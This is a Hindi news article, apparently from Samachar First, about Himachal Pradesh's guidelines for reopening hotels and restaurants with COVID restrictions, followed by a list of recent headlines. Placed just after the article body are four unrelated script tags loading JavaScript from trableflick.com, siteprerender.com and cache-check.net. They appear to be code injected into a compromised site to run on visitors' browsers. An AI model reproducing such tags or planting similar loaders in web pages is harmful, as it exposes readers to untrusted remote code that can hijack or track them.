Categories: हिमाचल

हिमाचल में होटल और रेस्टोरेंट खोलने को लेकर नई गाइडलाइन हुई जारी

<p>हिमाचल में बुधवार से कुछ शर्तों के साथ होटल और रेस्टोरेंट खुल सकेंगे। पर्यटन विभाग ने मुख्यमंत्री की मंजूरी के बाद मंगलवार देर शाम को गाइडलाइन जारी कर दी है। भारत सरकार की बीते दिनों आठ जून से होटल खोलने के लिए बनाए नियमों को ही प्रदेश में लागू करने का फैसला लिया है। राज्य आपदा प्रबंधन के निर्देशों को भी विभाग ने शामिल किया है। बुधवार से प्रदेश में होटलों, रेस्टोरेंट, बेड एंड ब्रेकफास्ट और होम स्टे खोलने की राह साफ हो गई। सरकारी होटल भी काम करना शुरू कर देंगे।</p>

<p>जो होटल कारोबारी निजी होटलों को खोलना चाहते हैं वे भी नियमों के तहत कारोबार शुरू कर सकेंगे। पर्यटन विभाग ने स्पष्ट किया है कि हिमाचल के होटलों में ठहरने की सुविधा अभी स्थानीय लोगों को ही मिलेगी। बाहरी राज्यों के सैलानियों को कमरे देने पर पूर्ण पाबंदी है। हालांकि बाहरी राज्यों से सरकारी और व्यापारिक कार्य के लिए आने वालों को होटलों में ठहरने की छूट है। पर्यटन गतिविधियों के लिए होटलों में एंट्री नहीं दी जाएगी। बच्चों, गर्भवती महिलाओं और बुजुर्गों को रेस्टोरेंट जाने से परहेज करने की सलाह दी गई है।</p>

<p>रेस्टारेंट में ग्राहक के जाने के बाद सीट सेनिटाइज करनी होगी। अगर कोई परिवार रेस्टोरेंट में आता है तो उनका टेबल शेयर हो सकता है। रेस्टोरेंट स्टाफ को ग्लव्ज और मॉस्क पहनना जरूरी होगा। कंटेनमेंट जोन में होटल, रेस्टारेंट खोलने की इजाजत नहीं होगी। आरोग्य सेतु एप्लीकेशन मोबाइल फोन पर डाउनलोड करने वालों को ही होटल-रेस्टोरेंट में एंट्री मिलेगी। होटल-रेस्तरां के स्टाफ और गेस्ट का रोजाना थर्मल स्कैनर से तापमान जांचा जाना भी अनिवार्य किया गया है। होटल में ठहरे व्यक्ति से मिलने बाहर से कोई नहीं आ सकेगा। शारीरिक दूरी बनाए रखने के लिए होटलों को ऑनलाइन ही फार्म भरवाने और पेमेंट लेने का विकल्प दिया गया है। होटल के बाथरूम में गेस्ट द्वारा कपड़े धोने पर रोक रहेगी।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1591765000823″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

मुख्यमंत्री के निर्देश पर हमीरपुर में ‘कायाकल्प’ अभियान से बदल रही है शहर की तस्वीर

  Hamirpur: मुख्यमंत्री ठाकुर सुखविंदर सिंह सुक्खू के गृह जिले के मुख्यालय हमीरपुर शहर की…

5 seconds ago

राज्य के स्वास्थ्य ढांचे को मजबूत करने के लिए ठोस कदम उठा रही है सरकार: बाली

  टांडा मेडिकल कालेज भी स्वास्थ्य क्षेत्र में निरंतर नए आयाम कर रहा स्थापित विश्व…

19 mins ago

प्रमोशन लिस्ट के इंतजार में कई शिक्षक बिना प्रिंसिपल बने होंगे रिटायर

  वर्तमान में प्रिंसिपल के 500 पद है खाली लेक्चरर्स की 90:10 की मांग का…

1 hour ago

अनुष्का दत्ता पहुंची मिस यूनिवर्स इंडिया-2024 के फाइनल में, हिमाचल की पहली प्रतिभागी

  Shimla: रोह‍डू की रहने वाली 22 वर्षीय अनुष्का दत्ता मिस यूनिवर्स इंडिया 2024 प्रतियोगिता…

1 hour ago

मस्जिद विवाद के बीच विक्रमादित्य की वक्फ बोर्ड में सुधार की नस‍ीहत

Shimla:हिमाचल और हिमाचलियत के हित सर्वश्रेष्ठ, सर्वत्र हिमाचल का संपूर्ण विकास। समय के साथ हर…

2 hours ago

कंगना का मंडी प्रेम: ‘यह मेरा घर है, यहां काम करूंगी

Manali: मशहूर अभिनेत्री कंगना रनौत ने  मनाली की यात्रा के दौरान अपने गृहनगर और लोगों…

2 hours ago